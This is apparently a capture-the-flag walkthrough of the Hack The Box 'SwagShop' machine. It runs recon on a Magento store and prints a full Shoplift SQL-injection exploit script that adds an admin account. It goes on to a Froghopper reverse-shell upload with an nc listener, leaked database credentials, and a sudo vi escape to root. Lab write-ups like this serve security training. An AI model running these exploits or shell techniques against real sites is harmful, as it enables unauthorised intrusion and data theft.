SwagShop

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.140   

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.23 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.140    

68/udp open|filtered dhcpc
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1042.92 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.140

Enumeration: SSH 22/tcp

OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)

Enumeration: HTTP 80/tcp

I always start off with enumerating HTTP first. Visit the web application.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  
10.10.10.140    swagshop.htb

http://swagshop.htb/
Apache httpd 2.4.29 ((Ubuntu))

http://swagshop.htb/index.php/
http://swagshop.htb/index.php/?SID=736l08tv4jbargk0md6vs8aqt0about-magento-demo-store/
http://swagshop.htb/index.php/5-x-hack-the-box-sticker.html?SID=736l08tv4jbargk0md6vs8aqt0

http://swagshop.htb/index.php/review/product/list/id/3/#review-form
http://swagshop.htb/index.php/sales/guest/form/?SID=736l08tv4jbargk0md6vs8aqt0

http://swagshop.htb/index.php/customer/account/login/
http://swagshop.htb/index.php/customer/account/create/

http://swagshop.htb/index.php/catalog/seo_sitemap/category/?SID=736l08tv4jbargk0md6vs8aqt0

Gobuster:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://swagshop.htb/index.php/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt,html

/home                 (Status: 200) [Size: 16591]
/0                    (Status: 200) [Size: 16593]
/contacts             (Status: 200) [Size: 15600]
/catalog              (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/]
/admin                (Status: 200) [Size: 3609]
/Home                 (Status: 200) [Size: 16591]
/core                 (Status: 200) [Size: 0]
/install              (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/]
/cms                  (Status: 200) [Size: 16593]
/api                  (Status: 200) [Size: 361]
/checkout             (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/checkout/onepage/]
/wishlist             (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/customer/account/login/]
/HOME                 (Status: 200) [Size: 16591]
/customer-service     (Status: 200) [Size: 19801]

Nikto:

┌──(kali💀kali)-[~/Desktop]
└─$ nikto -h http://10.10.10.140

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://swagshop.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /favicon.ico: identifies this app/server as: Magento Go CMS. See: https://en.wikipedia.org/wiki/Favicon
+ /app/: Directory indexing found.
+ /app/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ /install.php: install.php file found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /RELEASE_NOTES.txt: A database error may reveal internal details about the running database.
+ /RELEASE_NOTES.txt: Magento Shop Changelog identified.
+ /skin/adminhtml/default/default/media/editor.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploader.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploaderSingle.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /var/: Directory indexing found.
+ /var/: /var directory has indexing enabled.
+ 8060 requests: 1 error(s) and 20 item(s) reported on remote host
+ End Time:           2024-01-09 00:17:56 (GMT-5) (5655 seconds)

view-source:http://swagshop.htb/index.php/
!--[if lt IE 7]>
<script type="text/javascript">
//<![CDATA[
    var BLANK_URL = 'http://swagshop.htb/js/blank.html';
    var BLANK_IMG = 'http://swagshop.htb/js/spacer.gif';
//]]>
</script>
<![endif]-->

<!--[if  (lte IE 8) & (!IEMobile)]>
<link rel="stylesheet" type="text/css" href="http://swagshop.htb/skin/frontend/rwd/default/css/styles-ie8.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://swagshop.htb/skin/frontend/rwd/default/css/madisonisland-ie8.css" media="all" />
<![endif]-->
<!--[if (gte IE 9) | (IEMobile)]><!-->

Magento

It’s running Magento, which is an open-source e-commerce platform written in PHP. Considering that it is an off the shelf software, we’ll probably find reported vulnerabilities that are associated to it. But first, we need to get a version number. Notice that at the bottom of the page, it has a copyright detailing the year 2014, which is 6 years ago, so it’s very likely to be vulnerable. Just like there is a scanner for WordPress applications (WPScan), there is one for Magento applications that is called Mega scan. Let’s use it to run a scan on the application.

Mage Scan: Scan a Magento site for information

GitHub - steverobbins/magescan: Scan a Magento site for informationGitHub

git clone https://github.com/steverobbins/magescan magescan
cd magescan
curl -sS https://getcomposer.org/installer | php
php composer.phar install
bin/magescan scan:all www.example.com

$ magescan.phar scan:all store.example.com
php magescan.phar -vvv scan:all 10.10.10.140 > output

-vvv: increase the verbosity to level 3 scan:all: run all scans

| Edition   | Community        |
| Version   | 1.9.0.0, 1.9.0.1 |
| app/etc/local.xml                       | 200           | Fail   |
| index.php/rss/order/NEW/new             | 200           | Fail   |
| shell/                                  | 200           | Fail   |

It reports the version number being 1.9.0.0 or 1.9.0.1 and they’re using the Community edition. There are no installed modules, so if we find any public vulnerabilities that are associated to modules, we can discard them. As for the unreachable path check, the last two paths don’t give us anything useful. However, the first path, gives us an xml file that leaks the swagshop mysql database username and password.

<host><![CDATA[localhost]]></host>
<username><![CDATA[root]]></username>
<password><![CDATA[fMVWh7bDHpgZkyfqQXreTjU9]]></password>
<dbname><![CDATA[swagshop]]></dbname>

This might come in handy later. Next, let’s run searchsploit.

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit magento
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection   | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execu | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?log | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/Index | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting      | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution   | php/webapps/37811.py
Magento eCommerce - Local File Disclosure                      | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                      | xml/webapps/37977.py
Magento eCommerce CE v2.3.5-p2 - Blind SQLi                    | php/webapps/50896.txt
Magento Server MAGMI Plugin - Multiple Vulnerabilities         | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion    | php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment  | php/webapps/48135.php

The first three exploits don’t match our version, so we’ll ignore them. The next two might be useful. Since Mage Scan didn’t report plugins, we’ll ignore the plugin vulnerabilities. The two after that might be relevant to our version. Lastly, we’ll also ignore the eBay Magento exploits.

We narrowed down our exploits to four possible options: 39838,37811,19793 and 37977. We’ll start off with looking into exploit number 37977 because it doesn’t require authentication and it is an RCE vulnerability.

Shell as www-data

Copy the exploit to our current directory.

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 37977
  Exploit: Magento eCommerce - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37977
     Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
    Codes: CVE-2015-1397, OSVDB-121260
 Verified: False
File Type: ASCII text
Copied to: /home/kali/Desktop/37977.py

-m: mirror an exploit to the current working directory.

After skimming through the code of the exploit,it seems to be chaining several SQL injection vulnerabilities together that eventually create an administrative account on the system with the username/password forme/forme.

Magento eCommerce - Remote Code ExecutionExploit Database

To get the code working on our application, we need to make a few changes:

Remove all the uncommented comments & explanation (or you’ll get compilation errors)
Change the target variable to http://10.10.10.140/
Change the username/password to random/random (optional). Run the exploit.

┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
DID NOT WORK

It didn’t work and it doesn’t give us much of an explanation why. So let’s redirect all the traffic from the script to Burp. To do that, perform the following steps.

In Burp, visit Proxy > Options > Proxy Listeners > Add. In the Binding tab, set the Bind port to 8081 and and in the Request Handling tab, set the Redirect to host option to 10.10.10.140 and the Redirect to Port option to 80. Make sure to select the newly added listener once you’re done.
Go back to the script and change the target to http://localhost:8081
In Burp set intercept to be on.

This way all the traffic of the script will go through Burp first. Run the script again and send the request to Repeater. In Repeater, execute the request. As shown in the above image, the script is failing because it’s not finding the URL. Let’s try it in our browser.

http://localhost:8081/admin

Doesn’t work. Let’s visit other links in the website and see how the URL changes. If we click on the Hack the Box sticker we get the following link.

http://10.10.10.140/index.php/5-x-hack-the-box-sticker.html

It seems to be appending index.php to all the URLs. Let’s add that in our script. So now our target would be:

http://localhost:8081/index.php

http://swagshop.htb/app/etc/local.xml
<config>
<global>
<install>
<date>Wed, 08 May 2019 07:23:09 +0000</date>
</install>
<crypt>
<key>b355a9e0cd018d3f7f03607141518419</key>
</crypt>
<disable_local_modules>false</disable_local_modules>
<resources>
<db>
<table_prefix></table_prefix>
</db>
<default_setup>
<connection>
<host>localhost</host>
<username>root</username>
<password>fMVWh7bDHpgZkyfqQXreTjU9</password>
<dbname>swagshop</dbname>
<initStatements>SET NAMES utf8</initStatements>
<model>mysql4</model>
<type>pdo_mysql</type>
<pdoType></pdoType>
<active>1</active>
</connection>
</default_setup>
</resources>
<session_save>files</session_save>
</global>
<admin>
<routers>
<adminhtml>
<args>
<frontName>admin</frontName>
</args>
</adminhtml>
</routers>
</admin>
</config>

Username: root, Password: fMVWh7bDHpgZkyfqQXreTjU9 Key: b355a9e0cd018d3f7f03607141518419 FrontName: admin

I noticed that we have admin panel at http://swagshop.htb/index.php/admin and not at http://swagshop.htb/admin. I changed the script a bit to:

https://gist.githubusercontent.com/himanshudas75/226a3bcd4659af66b2c39c84fbcde443/raw/2c634652ccf28ea5a2f9bcf74f19c81e3a1766ed/exploit_37977.pygist.githubusercontent.com

##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author        : Manish Kishan Tanwar AKA error1046
#Date          : 25/08/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At  : Indishell Lab(originally developed by joren)
##################################################################################################
import requests
import base64
import sys

target = "http://swagshop.htb/index.php/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py 
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
WORKED
Check http://swagshop.htb/index.php/admin with creds forme:forme

Let’s login into Magneto using the following credentials:

http://swagshop.htb/index.php/admin/dashboard/index/key/036b971b8fcdc35f6c2d665a253c1550/

http://swagshop.htb/index.php/admin
Username: forme
Password: forme

Now, we are in the Magento Admin Panel. There are a bunch of different methods in which we can get the shell but we decided to use the “Froghopper” Attack. It is a File Upload attack. It got its name from the pepe frog image that was used as a meme to get the shell by the author of the exploit. The files uploaded are not accessible in their raw form which will prevent us from executing them. This can be bypassed by allowing Symlinks in Developer Settings (System > Configuration > developer > Template Settings)

Magneto have built-in feature to restrict the malicious extensions of the files that can cause harm. Hence all it allows are PNG, JPG, GIF etc. The protection mechanism checks for the header and the extension but not for the contents of the file being uploaded. This means that we can craft payload in such a way that we are able to upload it to the target system. Hence, we took the reverse shell script and added GIF98 on top of it to be able to upload it.

GIF98

Now we create a new category, named Demo. It needs to be active for the payload to work. Then upload the reverse shell script with double extension as shown in the image below.

Demo 
Yes
php-reverse-shell.php.png

Now proceed to the Newsletter Section and Click on Add New Template. In the Newsletter Template fill in the form with dummy details and then in the text filed add the path of template i.e., the reverse shell script as shown below.

{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

Now getting back to the Newsletter Template Section, we see that our newly created newsletter is visible. Before executing it, we run a listener on the port mentioned in the reverse shell. After that, we proceed to Preview the Newsletter template as shown in the image below.

┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.140] 37208
Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 06:40:04 up  9:34,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ whoami
www-data

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@swagshop:/$ 

www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ cat user.txt
3a79acc----------------------------

Privesc to root

We checked the sudo permissions and found that we can run vi with root privileges but inside /var/www/html/. We use the vi for editing the index.php inside the /var/www/html.

www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

Read Flag:

The fastest path to the flag is just to open it with vi. Based on the sudo output above, I’ll run:

sudo /usr/bin/vi /var/www/html/../../../root/root.txt

Shell: Great! Searching in gtfobins I found this.

vi | GTFOBinsgtfobins.github.io

sudo /usr/bin/vi /var/www/html/* -c ':!/bin/sh' /dev/null

# whoami
root

# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@swagshop:/# 

root@swagshop:/# cat /root/root.txt
70a031-------------------------------

PreviousFriendZone NextNetworked

Last updated 2 years ago

hashtag Reconnaissance: NMAP

hashtag Enumeration: SSH 22/tcp

hashtag Enumeration: HTTP 80/tcp

hashtag Magento

hashtag Shell as www-data

hashtag Privesc to root